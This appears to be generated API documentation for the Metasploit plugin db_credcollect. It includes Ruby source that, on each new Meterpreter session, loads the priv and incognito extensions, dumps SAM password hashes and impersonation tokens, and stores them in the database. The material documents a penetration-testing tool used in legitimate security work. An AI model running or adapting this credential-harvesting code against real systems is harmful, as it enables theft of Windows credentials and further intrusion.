Class: Msf::Plugin::CredCollect

Inherits:
Msf::Plugin
Includes:
SessionEvent
Defined in:
plugins/db_credcollect.rb

Defined Under Namespace

Classes: CredCollectCommandDispatcher

Instance Attribute Summary

Attributes inherited from Msf::Plugin

#opts

Attributes included from Framework::Offspring

#framework

Instance Method Summary

Methods included from SessionEvent

#on_session_command, #on_session_download, #on_session_filedelete, #on_session_interact, #on_session_output, #on_session_upload

Methods inherited from Msf::Plugin

#add_console_dispatcher, create, #flush, #input, #output, #print, #print_error, #print_good, #print_line, #print_status, #print_warning, #remove_console_dispatcher

Constructor Details

#initialize(framework, opts) ⇒ CredCollect

Returns a new instance of CredCollect.



# File 'plugins/db_credcollect.rb', line 88

# Wire the plugin into the framework: subscribe to session events so the
# SessionEvent hooks below fire for every new session, and register the
# plugin's console command dispatcher.
#
# @param framework [Msf::Framework] the running framework instance
# @param opts [Hash] plugin options, handed through to Msf::Plugin
def initialize(framework, opts)
  super
  event_bus = self.framework.events
  event_bus.add_session_subscriber(self)
  add_console_dispatcher(CredCollectCommandDispatcher)
end

Instance Method Details

#cleanup ⇒ Object



# File 'plugins/db_credcollect.rb', line 94

# Undo what #initialize registered: stop receiving session events and
# drop the 'credcollect' console dispatcher. Called when the plugin is
# unloaded.
#
# @return [void]
def cleanup
  event_bus = framework.events
  event_bus.remove_session_subscriber(self)
  remove_console_dispatcher('credcollect')
end

#desc ⇒ Object



# File 'plugins/db_credcollect.rb', line 103

# Human-readable description shown by the plugin loader.
#
# @return [String] one-line summary of what the plugin does
def desc
  "Automatically grab hashes and tokens from Meterpreter session events and store them in the database"
end

#name ⇒ Object



# File 'plugins/db_credcollect.rb', line 99

# Identifier the framework uses to load and unload this plugin.
#
# @return [String] the plugin name
def name
  "db_credcollect"
end

#on_session_close(session, reason = '') ⇒ Object



# File 'plugins/db_credcollect.rb', line 86

# SessionEvent hook for session teardown. Collection happens entirely in
# #on_session_open, so there is nothing to do here; the method exists
# to satisfy the subscriber interface.
#
# @param session [Msf::Session] the session being closed
# @param reason [String] why the session closed
# @return [nil]
def on_session_close(session, reason = '')
  # Intentionally a no-op.
  nil
end

#on_session_open(session) ⇒ Object



# File 'plugins/db_credcollect.rb', line 35

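# SessionEvent hook for session establishment. For Meterpreter sessions it
# reads the SAM hashes and the impersonation tokens exposed by the priv and
# incognito extensions and records them in the framework database.
#
# Nothing is collected unless the database is connected. Non-meterpreter
# sessions only get the status line.
#
# @param session [Msf::Session] the session that was just opened
# @return [void]
def on_session_open(session)
  return unless framework.db.active

  print_status('This is CredCollect, I have the conn!')
  return unless session.type == 'meterpreter'

  # Load the extensions that provide session.priv and session.incognito.
  session.core.use('priv')
  session.core.use('incognito')

  addr = session.sock.peerhost
  # The session carries no port for the SAM data, so the auth records use the
  # default SMB port. Ideally this would be read from the exploit's datastore;
  # use the meterpreter script if the port needs to be controlled.
  smb_port = 445

  # One auth record per dumped account; the password field carries LM:NT.
  session.priv.sam_hashes.each do |hash|
    data = {
      host: addr,
      port: smb_port,
      sname: 'smb',
      user: hash.user_name,
      pass: "#{hash.lanman}:#{hash.ntlm}",
      type: 'smb_hash',
      active: true
    }
    framework.db.report_auth_info(data)
  end

  # incognito_list_tokens returns a hash of formatted strings; flatten them to
  # one token per line. Use the non-destructive strip: strip! returns nil when
  # there is nothing to strip, and the original code then raised on split.
  token_text = session.incognito.incognito_list_tokens(0).values.join.strip
  tokens = token_text.split("\n").reject(&:empty?)

  # One note per token; :unique_data keeps repeat sessions from duplicating it.
  tokens.each do |token|
    data = {
      host: addr,
      type: 'smb_token',
      data: token,
      update: :unique_data
    }
    framework.db.report_note(data)
  end
end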